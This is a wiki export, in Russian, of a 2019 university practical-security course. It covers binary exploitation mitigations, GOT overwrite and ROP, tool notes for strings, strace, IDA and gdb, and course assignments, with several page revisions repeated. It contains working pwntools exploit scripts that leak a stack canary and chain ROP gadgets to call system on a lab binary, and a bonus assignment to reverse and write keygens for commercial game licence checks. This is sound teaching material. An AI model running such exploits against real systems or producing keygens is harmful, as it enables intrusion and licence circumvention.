Поэтому <code>read_data</code> может записать в буфер больше данных, чем доступно памяти в буфере, и затереть таким образом соседние объекты на куче.

Похожая проблема возникает при умножении и даже при неаккуратном прибавлении константного числа.

== Средства защиты ==
В программах на языках C и C++, скомпилированных современными компиляторами и работающих на современных ОС, присутствует большое число противодействий бинарным уязвимостям (mitigations).

=== No execute (NX) ===

Средства ОС и процессора позволяют гибко настраивать права доступа на страницы виртуальной памяти. Эти права доступа позволяют запрещать выполнять данные как инструкции процессора. Напрмер, даже если записать шеллкод на стек, в память, выделенную через <code>malloc</code> или в статический глобальный буфер, при попытке выполнить этот код произойдет <code>SIGSEGV</code>

На уровне пользовательской программы это реализовано флагом <code>prot</code> в системных вызовах <code>mmap</code> и <code>mprotect</code>. Сам пользовательский код редко использует эти системные вызовы напрямую: ядро системы, динамический загрузчик (<code>ld.so</code>) и libc сами выделяют память с правильными правами доступа.

Фактически это означает, что чтобы в таких условиях добиться выполнения произвольного кода (или хотя бы выходящего за спецификацию исходной программы), придется провести атаку переиспользования кода (code reuse) в том или ином виде. Например, переписать указатель на какую-то безобидную функцую на <code>system</code>.

Посмотреть карту виртуальной памяти запущенного процесса можно при помощи программы <code>pmap</code>, команды <code>info proc mappings</code> в GDB, или <code>vmmap</code> в GDB+PEDA.

* https://en.wikipedia.org/wiki/NX_bit

=== ASLR ===

Чтобы затруднить атаки класса переиспользования кода (code reuse), такие как возврат в libc, адреса стека, кучи, и загрузки библиотек рандомизируются при каждом запуске программы. Это называется address space layout randomization.

Например, если в программе есть уязвимость, позволяющая переписать указатель на функцию, вы не можете записать туда адрес функции <code>system</code> просто потому, что вы не знаете адрес этой функции. Похожая ситуация будет, если есть указатель на какую-то структуру (например, содержащую в себе флаг <code>is_admin</code>): возможно вы и можете создать фейковую структуру с правильными полями на стеке, но вы не знаете, по какому адресу она окажется, чтобы записать этот адрес в тот указатель.

Как и многие другие защиты, ASLR не является абсолютной. Если в программе есть баг, позволяющий читать память за границей массива на стеке, с большой вероятностью вы там найдете адрес, ведущий в libc. Например, функция <code>main</code> возвращается куда-то в недра <code>__libc_start_main</code>, и если получится узнать адрес возврата, то посчитав смещение этого места относительно начала libc (для этой конкретной версии libc!), вы сможете узнать адрес загрузки библиотеки - и, соответственно, адреса всех функций, смещения которых фиксированы относительно базового адреса загрузки.

Начиная с примерно 2018 года большинство дистрибутивов Linux стали компилировать программы в режиме PIE (position-independent executable), позволяющие ОС и загрузчику рандомизировать также адрес загрузки самого бинаря, который до этого был всегда фиксировано <code>0x00400000</code>.

Проверить наличие PIE можно при помощи следующей команды pwntools. ASLR же для стека, кучи и библиотек при этом присутствует в любом случае.

<pre>
$ pwn checksec /bin/bash
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://en.wikipedia.org/wiki/Address_space_layout_randomization

=== Stack canary ===
Stack canary (<code>-fstack-protector</code>, stack smashing protector) - один из способов защиты от переполнения буфера на стеке.

При переполнении буфера освовную опасность представляет перезапись адреса возврата функции. От этого канарейка и защищает.

В прологе функции за адресом возврата<ref>Иногда и перед потенциально опасными локальными переменными, как то указатели на функции.</ref> на стек сохраняется специальное секретное значение, которое проверяется при выходе из функции. Если оно изменилось, то значит произошло переполнение буфера на стеке, и программа немедленно завершается, не выполняя инструкцию ret.

В glibc канарейка генерируется один раз при запуске программы, и никогда не меняется. Если есть уязвимость, позволяющая прочесть значение канарейки, то её можно обойти, просто записывая поверх канарейки её значение. Однако алгоритм генерации всегда включает в значение нулевой байт, что может усложнить эксплуатацию при помощи строковых функций типа <code>strcpy</code>.

В HexRays проверка канарейки декомпилируется неправильно. Но всегда, когда вы видите <code>__readfsqword(0x28u)</code>, можете быть увереными, что это оно. Если хотите посмотреть корректный код, смотрите дизассемблер.

* https://wiki.osdev.org/Stack_Smashing_Protector

== Техники эксплуатации ==

=== Перезапись GOT ===
В динамических слинкованных бинарях для вызова фунций из библиотек (libc и другие) используется специальная таблица GOT (global offset table).

Эта таблица содержит адреса библиотечных функций, которые требуются данной программе<ref>Библиотеки тоже могут использовать функции из других библиотек, у них тоже есть такая таблица.</ref>. Эта таблица заполняется динамических загрузчиком (ld.so, dynamic linker/loader). По умолчанию эта таблица заполняется лениво: вместо адресов целевых функций там лежат адреса заглушек, которые вызывают динамический загрузчик, который в свою очередь заносит в таблицу уже адрес нужной функции и передает управление на неё. При последующих вызовах функция уже будет вызываться непосредственно, без загрузчика.

Поскольку такая ленивость предполагает доступ к этой таблице на запись во время работы программы, записи в ней очень удобно переписывать в процессе эксплуатации. Основными претендентами являются функции, принимающие первым аргументом указатель на контролируемую пользователем строку, типа <code>free</code>, <code>strlen</code>, и т.д.: их удобно переписывать на адрес <code>system</code>.

Также бывает полезно читать данные оттуда для получения смещения libc и обхода ASLR таким образом.

Так как GOT обычно находится перед секциями <code>.data</code> и <code>.bss</code>, в эту таблицу можно попасть по отрицательным смещениям относительно глобальных переменных, также через arbitrary read/write по произвольному абсолютному адресу.

Опционально при компиляции можно включить защиту RELRO, которая делает эту таблицу неленивой и недоступной для запись. Уровень защиты можно проверить при помощи checksec (Partial RELRO с точки зрения эксплуатации не отличается от отсутствия RELRO, защиту обеспечивает только Full RELRO):
<pre>
% ~/.local/bin/pwn checksec /bin/cat
[*] '/bin/cat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough/elf-symbols-got-overwrite

=== Return-oriented programming ===

Return-oriented programming (ROP) - популярная техника эксплуатации переполнения буфера на стеке.

В самом простом варианте эксплуатации такого переполнения переписывается только адрес возврата функции. Однако такое не позволяет вызвать функцию с произвольными параметрами, можно лишь передавать управление на готовые куски кода. Это само по себе неплохо, если есть хорошие места в программе или в библиотеках (см. [https://github.com/david942j/one_gadget one gadget RCE] в libc).

Но можно пойти дальше. Если есть возможность переписать и после адреса возврата, туда можно записать адреса т.н. гаджетов - последовательностей инструкций, заканчивающихся на <code>ret</code>.

Эти гаджеты можно находить при помощи программ ropper, ROPGadget, и других. Эти программы позволяют находить гаджеты, которые не видны при простом дизассемблировании, т.к. как они могут начинаться на середине инструкции:

<pre>
$ ~/.local/bin/pwn disasm -c amd64 5FC3
0: 5f pop rdi
1: c3 ret
$ ~/.local/bin/pwn disasm -c amd64 415FC3
0: 41 5f pop r15
2: c3 ret
</pre>

<pre>
$ ~/.local/bin/ropper --file example_1.5_gets
...
0x0000000000400ba3: pop rdi; ret;
0x0000000000400ba1: pop rsi; pop r15; ret;
...
</pre>

Например, нужно вызвать функцию по адресу <code>0xdeadbeef</code> функцию с аргументами 1 и 2. Тогда на стек, начиная с адреса возврата, нужно записать такие 64-битные числа: <code>0x0000000000400ba3, 0x1, 0x0000000000400ba1, 0x2, 0x1337, 0xdeadbeef</code>. Для понимания, как это работает, нужно отследить как меняется RSP по мере выполнения инструкций <code>ret</code> и <code>pop</code>.

* https://en.wikipedia.org/wiki/Return-oriented_programming
* https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI - какие регистры используются при вызове функций.

=== Пример эксплоита ===

Эксплоит для ./example_1.5_gets:

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

gdb.attach(p,
"b * 0x400B2D"
)

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24

payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x4009B0) # read_line
payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x400B33) # system

p.sendline(payload)

p.sendline("sh")

p.sendline("id")

p.interactive()

</pre>

== Инструменты ==

=== pwntools ===

pwntools - удобная библиотека-фреймворк для написания эксплоитов.

http://docs.pwntools.com/en/stable/index.html

Эксплоит для примера <code>example_1.5_gets</code>, разбираемого на задании ([[Media:2019 pwn samples.zip]]):

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
#context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

#gdb.attach(p) # <- uncomment to enable debugger

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24
payload += p64(0x400B33) # <- try to set it to 0xdeadbeef and see what happens in debugger

p.sendline(payload)

p.interactive()
</pre>

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-23T00:47:55Z

WGH: /* Задания по эксплуатации бинарных уязвимостей */ imgenhancer

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==
Будут выложены после соответствующих занятий.

=== Бонусное задание 1 (imgenhancer) ===

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

В этом задании есть два флага. Ко второй части задания рекомендуется приступать после семинара 26 марта.

* http://imgenhancer.tasks.course.secsem.ru/
* [[Media:2019 pwn imgenhancer.zip]]

Если вам кажется, что что-то не работает, пишите на почту mailto:wgh+secsem2019@seclab.cs.msu.ru.

Файл:2019 pwn imgenhancer.zip

2019-03-23T00:45:15Z

WGH:

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-20T22:41:37Z

WGH: /* Бонусное задание */ выложено условие

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==
Будут выложены после соответствующих занятий.

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-03-20T22:15:51Z

WGH: /* pwntools */ ссылка на архив с бинарями

Введение в практическую безопасность (2019)

2019-03-20T22:10:16Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ /Бинарная эксплуатация

__NOTOC__
'''Введение в практическую безопасность''' — математический спецкурс по выбору, читается лабораторией интеллектуальных систем кибербезопасности (ЛИСК) кафедры информационной безопасности (ИБ) факультета ВМК.

* '''Когда''': каждый вторник, 18:05, с 12 февраля 2019
* '''Где''': аудитория 685, 2-й учебный корпус, планета Земля, Млечный Путь.
* '''Чат''': https://t.me/joinchat/B4hXs1Z5I6qEtns9fjgbfg или Matrix [https://matrix.to/#/#7fZs5vxGhmxS5KPHDTatYQ:torlan.ru #7fZs5vxGhmxS5KPHDTatYQ:torlan.ru]

Курс рекомендуется студентам, интересующимся практической безопасностью, в особенности — студентам 2-го курса, планирующим распределиться в лабораторию. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты на курсе:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания вместе дадут '''3000'''. Гарантируется, что 3000 и больше будут давать оценку "отлично". Большая часть заданий будет выполнена в формате ctf-тасков<ref>Кстати, у нас есть CTF-команда [[Bushwhackers]], приглашаем вас поиграть с нами!</ref>.

== Задания ==

* [[Введение_в_практическую_безопасность_(2019)/Задания_по_вебу|Задания по вебу]]
* [[/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей|Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей]]

== Материалы ==

=== Веб ===
* [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection|HTTP, инструменты и SQL injection]] - по теме первого занятия по веб-безопасности
* [[Введение_в_практическую_безопасность_(2019)/Эксплуатация_SQL_injection|Эксплуатация SQL injection]] и [[Введение_в_практическую_безопасность_(2019)/Небезопасная_загрузка_файлов|Небезопасная загрузка файлов]] - по теме второго занятия по веб-безопасности
* [[Введение_в_практическую_безопасность_(2019)/Атаки_на_клиента_веб-приложения_-_CSRF_&_XSS|Атаки на клиента веб-приложения - CSRF и XSS]] - по теме третьего занятия по веб-безопасности

Также может быть полезным [[Введение_в_практическую_безопасность_(2019)/Свой_тестовый_веб-сервер|как поднять свой тестовый веб-сервер]].

Еще про веб-безопасность - Веб-безопасность 101. Курс молодого бойца от Андрея Петухова https://docs.google.com/document/d/13zgZ_CRRHADwxf41mSSSuoJQLkMc67TXxpYLoW6lRak

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[/Реверс-инжиниринг|Реверс-инжиниринг]]
* [[/Бинарная эксплуатация|Бинарная эксплуатация]]

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-03-20T22:09:11Z

WGH: материалы про бинарщину

Файл:2019 pwn samples.zip

2019-03-19T14:47:30Z

WGH:

Введение в практическую безопасность (2019)/Реверс-инжиниринг

2019-03-13T18:22:35Z

WGH: раздел про gdb

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарники, которые были рассмотрены на семинаре: [[Media:2019 reverse examples.zip]].

Исходник первого примера: [[Media:2019 reverse example 1.c]]

Пример валидного ключа: <code>AAAAA-BBBBB-CCCCC-B334C
</code>

Алгоритм проверки ключа на Python:
<pre>
import string
import hashlib

def validate_key(s):
if len(s) != 23:
return False

for i, c in enumerate(s):
if i in (5, 11, 17):
if c != '-':
return False
else:
if c not in (string.ascii_uppercase + string.digits):
return False

m = hashlib.md5()
m.update(s[:17].encode('ascii'))
m.update(bytes([0x4d,0x67,0xde,0xb9,0x60,0xce,0x38,0x30,0xe1,0xb7,0x40,0xe5,0xeb,0x39,0xe0,0x15]))

return s[18:] == m.hexdigest()[:5].upper()
</pre>

Введение в практическую безопасность (2019)

2019-03-13T18:14:58Z

WGH: /* Задания */ добавлены задания по бинарщине

'''Введение в практическую безопасность''' — математический спецкурс по выбору, читается лабораторией интеллектуальных систем кибербезопасности (ЛИСК) кафедры информационной безопасности (ИБ) факультета ВМК.

* '''Когда''': каждый вторник, 18:05, с 12 февраля 2019
* '''Где''': аудитория 685, 2-й учебный корпус, планета Земля, Млечный Путь.
* '''Чат''': https://t.me/joinchat/B4hXs1Z5I6qEtns9fjgbfg или Matrix [https://matrix.to/#/#7fZs5vxGhmxS5KPHDTatYQ:torlan.ru #7fZs5vxGhmxS5KPHDTatYQ:torlan.ru]

Курс рекомендуется студентам, интересующимся практической безопасностью, в особенности — студентам 2-го курса, планирующим распределиться в лабораторию. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты на курсе:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания вместе дадут '''3000'''. Гарантируется, что 3000 и больше будут давать оценку "отлично". Большая часть заданий будет выполнена в формате ctf-тасков<ref>Кстати, у нас есть CTF-команда [[Bushwhackers]], приглашаем вас поиграть с нами!</ref>.

== Задания ==

* [[Введение_в_практическую_безопасность_(2019)/Задания_по_вебу|Задания по вебу]]
* [[/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей|Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей]]

== Материалы ==

* [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection|HTTP, инструменты и SQL injection]] - по теме первого занятия по веб-безопасности
* [[/Реверс-инжиниринг|Реверс-инжиниринг]]

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-13T18:14:35Z

WGH: Новая страница: «== Задания по реверс-инжинирингу == === Обязательные задания === Задания по этой теме реализ…»

Файл:2019 reverse task 2.zip

2019-03-13T17:24:54Z

WGH:

Файл:2019 reverse task 1.zip

2019-03-13T17:24:41Z

WGH:

Введение в практическую безопасность (2019)/Реверс-инжиниринг

2019-03-13T11:44:05Z

WGH: /* Примеры с занятия */ пример валидного ключа

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== Примеры с занятия ==

Бинарники, которые были рассмотрены на семинаре: [[Media:2019 reverse examples.zip]].

Исходник первого примера: [[Media:2019 reverse example 1.c]]

Пример валидного ключа: <code>AAAAA-BBBBB-CCCCC-B334C
</code>

Алгоритм проверки ключа на Python:
<pre>
import string
import hashlib

def validate_key(s):
if len(s) != 23:
return False

for i, c in enumerate(s):
if i in (5, 11, 17):
if c != '-':
return False
else:
if c not in (string.ascii_uppercase + string.digits):
return False

m = hashlib.md5()
m.update(s[:17].encode('ascii'))
m.update(bytes([0x4d,0x67,0xde,0xb9,0x60,0xce,0x38,0x30,0xe1,0xb7,0x40,0xe5,0xeb,0x39,0xe0,0x15]))

return s[18:] == m.hexdigest()[:5].upper()
</pre>

Шаблон:Клавиша/button

2019-03-13T11:24:27Z

WGH: стиль для этой вики

<kbd style="border-radius: 0.2em; box-shadow: 0.1em 0.2em 0.2em #222; background-color:black; font-family:sans-serif; color: white; font-size:0.85em; background-image: linear-gradient(top, #eee, #f9f9f9, #eee); padding:0.1em 0.3em; white-space:nowrap">{{#switch:{{lc:{{{1}}}}}
| caps lock = ⇪ Caps Lock
| [[caps lock]] = ⇪ [[Caps Lock]]
| shift = ⇧ Shift
| [[shift (клавиша)|shift]] = ⇧ [[Shift (клавиша)|Shift]]
| enter|ввод|клавиша ввода = ↵ Enter
